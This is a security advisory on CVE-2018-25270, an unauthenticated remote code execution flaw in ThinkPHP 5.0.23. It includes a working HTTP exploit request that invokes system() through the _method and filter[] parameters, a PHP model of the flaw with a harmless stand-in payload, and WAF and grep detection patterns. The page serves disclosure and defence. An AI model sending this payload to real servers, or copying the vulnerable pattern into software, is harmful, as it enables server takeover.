CVE-2018-25270: Unauthenticated RCE in ThinkPHP 5.0.23
A critical remote code execution vulnerability originally identified in 2018 has been formally catalogued in the NVD as CVE-2018-25270, carrying a CVSS score of 9.8 (Critical). The flaw resides in ThinkPHP 5.0.23, a widely deployed PHP web application framework with significant adoption across Chinese-language web ecosystems and beyond.
The vulnerability allows unauthenticated remote attackers to execute arbitrary PHP functions, including system() and passthru(), by sending a crafted POST request to the index.php front controller that abuses the framework's _method override parameter and injects a callable function name through the filter[] parameter. No credentials or prior access are required.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2018-25270 |
| CVSS Score | 9.8 (Critical) |
| CWE Classification | CWE-77 — Improper Neutralization of Special Elements used in a Command |
| Affected Software | ThinkPHP 5.0.23 |
| Attack Vector | Network |
| Authentication Required | None |
| Privileges Required | None |
| User Interaction | None |
| NVD Published | April 22, 2026 |
| Original Flaw Discovery | 2018 |
Technical Details
ThinkPHP 5.0.23 is vulnerable because its Request class honors a _method POST parameter intended for HTTP method override (emulating PUT or DELETE from an HTML form), but uses the supplied value directly as the name of a method to call on the Request object, passing the whole $_POST array as the argument. Supplying _method=__construct re-runs the constructor, which copies any POST key that matches a property name onto the object: filter[] sets the global input filter, method=get fixes the resolved request method, and get[] replaces the GET data. When the application is accessed via the captcha route (s=captcha), the framework subsequently calls param(), which runs every input value through the configured filters with call_user_func, so the injected filter name is invoked on the injected value.
Example attack request (the override parameters must travel in the POST body, because ThinkPHP reads _method from $_POST; the s=captcha query string only selects the route):

```http
POST /index.php?s=captcha HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&get[]=id
```

This causes ThinkPHP to invoke system("id"), or any other PHP callable named in filter[], server-side, returning the command output to the attacker. The payload can be adapted to run arbitrary OS commands.
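The following cut-down PHP model is added here as an illustration and is not taken from ThinkPHP's source: it reproduces the shape of the flaw with a Request class whose method() uses the _method value as a method name, a constructor that copies matching POST keys onto properties, and a param() that applies the configured filters with call_user_func. It also shows a hardened variant that whitelists real HTTP verbs, which is the shape of the upstream fix but is written here from scratch. The $post array is a constructed stand-in for $_POST carrying the page's payload, with strtoupper in place of system so the script can be run safely from the command line with php.

```php
<?php
// Added illustration of the ThinkPHP 5.0.23 _method flaw. Not framework code:
// property and method names follow think\Request, the bodies are cut down.

class VulnerableRequest
{
    protected $method;        // resolved request method, set lazily
    protected $get    = [];   // GET data returned by param()
    protected $filter = [];   // global input filter(s) that param() applies

    public function __construct(array $options = [])
    {
        // Any incoming key that matches a property name overwrites that property.
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }
    }

    // Flaw: the attacker-supplied `_method` value is used verbatim as the name
    // of a method on $this, and the whole POST array is passed to it.
    public function method(array $post)
    {
        if (!$this->method && isset($post['_method'])) {
            $this->method = strtoupper($post['_method']);  // '__CONSTRUCT'
            $this->{$this->method}($post);                  // PHP method names are case-insensitive
        }
        return $this->method ?: 'GET';
    }

    // param() runs every input value through the configured filters.
    public function param()
    {
        $data = $this->get;
        foreach ((array) $this->filter as $fn) {
            array_walk_recursive($data, function (&$value) use ($fn) {
                $value = call_user_func($fn, $value);  // filter[]=system -> system($value)
            });
        }
        return $data;
    }
}

// Hardened variant (this page's illustration of the fix): only a real HTTP verb
// may come from `_method`, so no arbitrary method name reaches $this->{...}().
class HardenedRequest extends VulnerableRequest
{
    public function method(array $post)
    {
        if (!$this->method && isset($post['_method'])) {
            $verb = strtoupper($post['_method']);
            $this->method = in_array($verb, ['GET', 'POST', 'PUT', 'DELETE', 'PATCH'], true)
                ? $verb
                : 'POST';
        }
        return $this->method ?: 'GET';
    }
}

// Constructed stand-in for $_POST carrying the page's payload, with strtoupper
// in place of system so the demo is harmless.
$post = [
    '_method' => '__construct',
    'filter'  => ['strtoupper'],
    'method'  => 'get',
    'get'     => ['id'],
];

$vulnerable = new VulnerableRequest();
$vulnerable->method($post);
var_dump($vulnerable->param());  // the attacker-named callable ran on attacker-supplied data

$hardened = new HardenedRequest();
$hardened->method($post);
var_dump($hardened->param());    // constructor never re-ran: filter and get were not overwritten
```

Run it with php and compare the two dumps: the vulnerable object returns the GET value transformed by the injected callable, while the hardened object returns an empty array because the constructor was never re-entered. Swapping strtoupper for system in $post is exactly the page's payload.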
Impact of successful exploitation:
- Execute arbitrary OS commands — full shell access on the web server
- Read sensitive files — configuration files, environment variables, database credentials
- Deploy webshells — persistent backdoor access to the server
- Pivot to internal network — lateral movement from the compromised host
- Data exfiltration — access to any data reachable from the server process
Context and Impact
ThinkPHP is a popular MVC framework in PHP, particularly within the Chinese developer community, and version 5.0.x saw significant adoption before the 5.1.x and 6.x branches superseded it. While the vulnerability dates to 2018, its late formal CVE assignment means it is now surfacing in vulnerability scanners and compliance tools for the first time.
Who is affected:
- Any web application running ThinkPHP 5.0.23 with public-facing HTTP access
- Legacy systems, older e-commerce platforms, or inherited codebases not updated since 2018
Real-world exploitation history: This class of ThinkPHP routing injection vulnerabilities was actively mass-exploited in 2018–2019 by automated scanning campaigns that leveraged the flaw to install cryptominers, webshells, and botnets. Public proof-of-concept code has been available since the original disclosure.
Remediation
- Upgrade ThinkPHP: migrate from 5.0.23 to ThinkPHP 6.x or the latest supported release, which addresses this class of routing injection vulnerabilities
- Restrict access if upgrade is not feasible: disable or restrict access to the `captcha` route and any other unauthenticated route, and reject requests whose `_method` value is not a real HTTP verb (the override exists only to emulate PUT and DELETE from HTML forms)
- Web Application Firewall: deploy WAF rules that inspect the POST body, not only the URL, and block requests containing `_method=__construct` or `filter[]=` patterns
- Audit for compromise: if running ThinkPHP 5.0.23, review web server logs for signs of exploitation:

  ```
  grep -i "_method=__construct" /var/log/nginx/access.log
  grep -i "filter\[" /var/log/nginx/access.log
  ```

  Caveat: the payload is sent in the POST body, which the default nginx and Apache access log formats do not record, so these patterns only catch attackers who also placed them in the query string. Additionally review POST requests to `/index.php?s=captcha` (and other `s=` route hits) from unfamiliar sources, and check WAF or reverse-proxy logs where request bodies are retained.
- File integrity monitoring: scan the webroot for unexpected `.php` files that may indicate a deployed webshell
Note: No official backport patch exists for ThinkPHP 5.0.23. Upgrading to a supported version is the only reliable remediation.
Key Takeaways
- CVE-2018-25270 is a critical unauthenticated RCE in ThinkPHP 5.0.23, now formally catalogued in NVD with CVSS 9.8
- No authentication required — any unauthenticated attacker with HTTP access can achieve remote code execution
- Exploitation is trivial — public PoC has existed since 2018; automated scanning campaigns targeted this vulnerability extensively
- Upgrade is the only safe fix — ThinkPHP 5.0.23 should be treated as end-of-life
- Audit existing deployments — organizations running legacy PHP applications should scan for ThinkPHP 5.0.x versions